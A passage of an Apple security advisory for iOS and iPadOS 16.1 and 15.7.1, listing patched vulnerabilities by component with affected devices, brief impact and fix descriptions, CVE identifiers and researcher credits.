Description: A memory corruption issue was addressed with improved state management.

CVE-2022-42820: Peter Pan ZhenPeng of STAR Labs

**IOKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A race condition was addressed with improved locking.

CVE-2022-42806: Tingting Yin of Tsinghua University

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved state management. 

CVE-2022-32944: Tim Michaud (@TimGMichaud) of Moveworks.ai

Entry added October 27, 2022

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges 

Description: A race condition was addressed with improved locking. 

CVE-2022-42803: Xinru Chi of Pangu Lab, John Aakerblom (@jaakerblom)

Entry added October 27, 2022

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges 

Description: The issue was addressed with improved bounds checks.

CVE-2022-32926: Tim Michaud (@TimGMichaud) of Moveworks.ai

Entry added October 27, 2022

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges 

Description: A logic issue was addressed with improved checks. 

CVE-2022-42801: Ian Beer of Google Project Zero

Entry added October 27, 2022

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-32924: Ian Beer of Google Project Zero

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: A remote user may be able to cause kernel code execution

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-42808: Zweig of Kunlun Lab

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: An application may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited.

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-42827: an anonymous researcher

**Model I/O**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: Processing a maliciously crafted USD file may disclose memory contents 

Description: The issue was addressed with improved memory handling. 

CVE-2022-42810: Xingwei Lin (@xwlin\_roy) and Yinyi Wu of Ant Security Light-Year Lab

Entry added October 27, 2022

**ppp**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: A buffer overflow may result in arbitrary code execution 

Description: The issue was addressed with improved bounds checks. 

CVE-2022-32941: an anonymous researcher

Entry added October 27, 2022

**ppp**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-42829: an anonymous researcher

**ppp**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-42830: an anonymous researcher

**ppp**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges

Description: A race condition was addressed with improved locking.

CVE-2022-42831: an anonymous researcher

CVE-2022-42832: an anonymous researcher

**Safari**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: Visiting a maliciously crafted website may leak sensitive data

Description: A logic issue was addressed with improved state management.

CVE-2022-42817: Mir Masood Ali, PhD student, University of Illinois at Chicago; Binoy Chitale, MS student, Stony Brook University; Mohammad Ghasemisharif, PhD Candidate, University of Illinois at Chicago; Chris Kanich, Associate Professor, University of Illinois at Chicago

Entry added October 27, 2022

**Sandbox**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: An app may be able to access user-sensitive data

Description: An access issue was addressed with additional sandbox restrictions.

CVE-2022-42811: Justin Bui (@slyd0g) of Snowflake

**Shortcuts**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: A shortcut may be able to check the existence of an arbitrary path on the file system

Description: A parsing issue in the handling of directory paths was addressed with improved path validation.

CVE-2022-32938: Cristian Dinca of Tudor Vianu National High School of Computer Science of. Romania

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: Visiting a malicious website may lead to user interface spoofing

Description: The issue was addressed with improved UI handling.

WebKit Bugzilla: 243693  
CVE-2022-42799: Jihwan Kim (@gPayl0ad), Dohyun Lee (@l33d0hyun)

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A type confusion issue was addressed with improved memory handling.

WebKit Bugzilla: 244622  
CVE-2022-42823: Dohyun Lee (@l33d0hyun) of SSD Labs

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may disclose sensitive user information

Description: A logic issue was addressed with improved state management.

WebKit Bugzilla: 245058  
CVE-2022-42824: Abdulrahman Alqabandi of Microsoft Browser Vulnerability Research, Ryan Shin of IAAI SecLab at Korea University, Dohyun Lee (@l33d0hyun) of DNSLab at Korea University

**WebKit PDF**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

WebKit Bugzilla: 242781  
CVE-2022-32922: Yonghwi Jin (@jinmo123) at Theori working with Trend Micro Zero Day Initiative

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may disclose internal states of the app

Description: A correctness issue in the JIT was addressed with improved checks.

WebKit Bugzilla: 242964  
CVE-2022-32923: Wonyoung Jung (@nonetype\_pwn) of KAIST Hacking Lab

Entry added October 27, 2022

**Wi-Fi**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: Joining a malicious Wi-Fi network may result in a denial-of-service of the Settings app 

Description: The issue was addressed with improved memory handling.

CVE-2022-32927: Dr Hideaki Goto of Tohoku University, Japan

Entry added October 27, 2022

**zlib**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: A user may be able to cause unexpected app termination or arbitrary code execution 

Description: This issue was addressed with improved checks.

CVE-2022-37434: Evgeny Legerov

CVE-2022-42800: Evgeny Legerov

Entry added October 27, 2022

CVE-2022-32946: About the security content of iOS 16.1 and iPadOS 16

A permissions issue was addressed with additional restrictions. This issue is fixed in iOS 15.7.1 and iPadOS 15.7.1, iOS 15.7 and iPadOS 15.7, iOS 16.1 and iPadOS 16. An app may be able to access iOS backups.

Released October 27, 2022

**Apple Neural Engine**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-32932: Mohamed Ghannam (@\_simo36)

**Audio**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Parsing a maliciously crafted audio file may lead to disclosure of user information

Description: The issue was addressed with improved memory handling.

CVE-2022-42798: Anonymous working with Trend Micro Zero Day Initiative

**Backup**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to access iOS backups

Description: A permissions issue was addressed with additional restrictions.

CVE-2022-32929: Csaba Fitzl (@theevilbit) of Offensive Security

**FaceTime**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A user may be able to view restricted content from the lock screen

Description: A lock screen issue was addressed with improved state management.

CVE-2022-32935: Bistrit Dahal

**Graphics Driver**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved bounds checks.

CVE-2022-32939: Willy R. Vasquez of The University of Texas at Austin

**Image Processing**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: This issue was addressed with improved checks.

CVE-2022-32949: Tingting Yin of Tsinghua University

**Kernel**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved state management.

CVE-2022-32944: Tim Michaud (@TimGMichaud) of Moveworks.ai

**Kernel**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A race condition was addressed with improved locking.

CVE-2022-42803: Xinru Chi of Pangu Lab, John Aakerblom (@jaakerblom)

**Kernel**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved bounds checks.

CVE-2022-32926: Tim Michaud (@TimGMichaud) of Moveworks.ai

**Kernel**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An application may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited.

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-42827: an anonymous researcher

**Kernel**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A logic issue was addressed with improved checks.

CVE-2022-42801: Ian Beer of Google Project Zero

**Model I/O**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing a maliciously crafted USD file may disclose memory contents

Description: The issue was addressed with improved memory handling.

CVE-2022-42810: Xingwei Lin (@xwlin\_roy) and Yinyi Wu of Ant Security Light-Year Lab

**ppp**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A buffer overflow may result in arbitrary code execution

Description: The issue was addressed with improved bounds checks.

CVE-2022-32941: an anonymous researcher

**Safari**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Visiting a maliciously crafted website may leak sensitive data

Description: A logic issue was addressed with improved state management.

CVE-2022-42817: Mir Masood Ali, PhD student, University of Illinois at Chicago; Binoy Chitale, MS student, Stony Brook University; Mohammad Ghasemisharif, PhD Candidate, University of Illinois at Chicago; Chris Kanich, Associate Professor, University of Illinois at Chicago

**WebKit**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may disclose internal states of the app

Description: A correctness issue in the JIT was addressed with improved checks.

WebKit Bugzilla: 242964  
CVE-2022-32923: Wonyoung Jung (@nonetype\_pwn) of KAIST Hacking Lab

**Wi-Fi**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Joining a malicious Wi-Fi network may result in a denial-of-service of the Settings app

Description: The issue was addressed with improved memory handling.

CVE-2022-32927: Dr Hideaki Goto of Tohoku University, Japan

**zlib**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A user may be able to cause unexpected app termination or arbitrary code execution

Description: This issue was addressed with improved checks.

CVE-2022-37434: Evgeny Legerov

CVE-2022-42800: Evgeny Legerov

Tag

#webkit